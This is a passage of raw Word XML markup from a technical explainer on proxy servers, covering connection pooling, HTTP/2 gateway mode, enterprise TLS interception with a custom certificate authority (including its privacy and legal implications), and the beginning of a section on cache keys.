      <w:r w:rsidRPr="00397DF6">
        <w:t>max_connections_per_backend: Hard cap on total connections (active + idle). Prevents overloading the backend with too many simultaneous connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BE856A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>max_idle_connections: How many idle connections to keep alive per backend. High value → faster request processing (always has a warm connection), but consumes backend file descriptors and memory for connections doing nothing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701122EC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>idle_connection_timeout: Close idle connections after N seconds. Balances resource consumption against connection reuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C75BBC2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="544"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>max_connection_lifetime: Force-close connections after N seconds of existence, regardless of activity. Prevents stale connections (backend firewall silently dropped the connection, proxy doesn't know). Forces periodic reconnection that detects dead backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB0DD6A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The keepalive negotiation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2B007A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>HTTP/1.1 connections are persistent by default (Connection: keep-alive). HTTP/1.0 connections close after each request unless explicitly requested to stay open. The proxy must manage keepalive semantics on both sides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE2168" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client → Proxy: May be HTTP/1.0 (close after response) or HTTP/1.1 (persistent). Proxy → Backend: Should always use HTTP/1.1 persistent connections (for pooling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481491DC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>decouples</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> the client-facing and backend-facing connection lifetimes. A client HTTP/1.0 connection (closes after one request) uses a backend persistent connection (stays open for reuse). The proxy converts between them transparently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582C8128" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 multiplexing at the proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E63CC60" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>HTTP/2 over a single TCP connection carries multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (requests) simultaneously. When a client sends multiple requests over one HTTP/2 connection, the proxy must:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A4477C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Demultiplex incoming streams — separate streams by stream ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5713E5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Route each stream's request to the appropriate backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A32CB4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Fan out to multiple backend connections (one stream may go to Backend A, another to Backend B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F6E089" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Re-multiplex responses back onto the client's HTTP/2 connection under the correct stream ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1110DE3C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The HTTP/2 to HTTP/1.1 translation challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Many backends don't support HTTP/2. The proxy accepts HTTP/2 from clients (single multiplexed connection), translates each stream to an HTTP/1.1 request, and sends to the backend over the connection pool. This is called </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> mode — the proxy bridges HTTP/2 clients to HTTP/1.1 backends. The client gets the efficiency of HTTP/2 multiplexing without requiring the backend to implement HTTP/2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2A5DF1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="53EE7C6C">
          <v:rect id="_x0000_i3055" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2762BE98" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. SSL/TLS Interception — How Enterprise Proxies Inspect HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236911B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Man-in-the-Middle Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52698203" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Enterprise security proxies need to inspect HTTPS traffic for malware, data exfiltration, and policy enforcement. But HTTPS is designed to prevent exactly this kind of inspection (that's the point of encryption). SSL interception works by deploying a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trusted MITM</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AD98B0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C76B7D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="546"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The enterprise deploys a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>custom Certificate Authority (CA)</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — a CA whose root certificate the enterprise controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37733BD4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="546"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>This custom CA root certificate is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>installed as a trusted root</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> on all enterprise devices (via MDM, Group Policy, or similar). The OS and browsers trust this CA as much as they trust DigiCert or Let's Encrypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB0E4E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="546"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The SSL inspection proxy holds the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>private key</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> of this custom CA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF0B275" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-connection interception mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB1077" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a client connects to https://www.bank.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B37687" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client sends CONNECT www.bank.com:443 to the proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6F5F4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Proxy intercepts (rather than tunneling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A67479" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Proxy </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dynamically generates a certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> for www.bank.com, signed by the custom enterprise CA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CF0FD5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Proxy presents this generated certificate to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F6254" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Client validates the certificate — it's signed by the enterprise CA, which the client trusts (because the enterprise installed it). </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No certificate warning appears.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The client believes it's talking to the real www.bank.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C0569" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client completes TLS with the proxy (the proxy now has the session keys — it can decrypt client traffic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B85F44" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Proxy simultaneously establishes a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>second TLS connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> to the real www.bank.com, validating its certificate against the public CAs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B9089" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Now the proxy can read all plaintext between client and server — HTTP requests and responses are fully visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1754D9FF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy applies inspection policies (malware scanning, DLP, URL categorization) and forwards (or blocks) accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3BD9CA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The certificate generation pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1EDF2A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy caches generated certificates per hostname (with TTL — re-generated when they'd expire). The critical elements of the generated certificate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776444B7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="548"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subject CN/SAN:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Must match the actual hostname (www.bank.com).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD276D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="548"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Validity period:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Must be within the original certificate's validity period (proxy reads the real server's certificate validity and constrains its generated cert accordingly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE5FAE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="548"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Usage and Extended Key Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Must match the real certificate (TLS server auth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39834E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="548"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signed by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The enterprise CA. This is the MITM — the client trusts this fake cert because it trusts the CA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F3329" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What SSL inspection breaks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0A6E0F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Certificate pinning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Applications that embed the expected certificate's public key fingerprint (mobile apps, native applications) detect that the presented certificate's key doesn't match the pinned key. Connection is rejected. The SSL inspection proxy is defeated by certificate pinning. This is why mobile apps and native applications are increasingly hard to inspect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2CF7D5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Certificate Transparency (CT) logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> All publicly trusted certificates must be logged in CT logs. The enterprise CA's certificates are NOT in CT logs (the CA is not publicly trusted). If an application checks CT logs for the certificate, it will find the generated cert is not logged — suspicious. Enterprise CAs typically bypass CT verification for internally trusted Certs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2CA408" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HPKP (HTTP Public Key Pinning):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Deprecated but historically caused browsers to reject certificates with non-pinned keys. SSL inspection proxies had to explicitly whitelist HPKP-pinned sites and bypass inspection for them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219DB846" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Client certificates (mTLS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If the server requires the client to present a certificate for authentication, the proxy cannot fulfill this — it doesn't have the client's private key. SSL inspection proxies must bypass mTLS connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB32873" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The privacy and legal implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623A783" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>SSL interception means the enterprise proxy can read all employee HTTPS traffic — banking, medical, personal email, everything. This raises significant legal and ethical issues in many jurisdictions. Informed consent (employees are notified via policy), scope limitations (personal devices excluded), and legal counsel involvement are typically required. GDPR, HIPAA, and other regulations may restrict what can be inspected and retained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DDF700" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="7F282F25">
          <v:rect id="_x0000_i3056" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E598D7E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Caching Proxy — Internal Cache Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C961A73" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Proxy Caches Work Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35819B66" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A caching proxy stores responses locally and serves subsequent requests from cache rather than forwarding to the origin server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483367EE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache key construction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7726E10F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The cache key determines when two requests are for the same logical resource. The primary cache key is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>request URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (including query parameters). But the same URL may return different responses based on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29950738" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="549"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Accept-Encoding: gzip vs Accept-Encoding: identity — different response bodies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542B21B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="549"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Accept-Language: en vs Accept-Language: zh — different content languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB78993" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="549"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Cookie — personalized responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25CF73" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="549"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Authorization — user-specific data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B946324" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The HTTP Vary header tells the proxy which request headers affect the response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AC395D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58218418" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Vary: Accept-Encoding, Accept-Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D5685C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>The proxy stores </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>separate cache entries</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
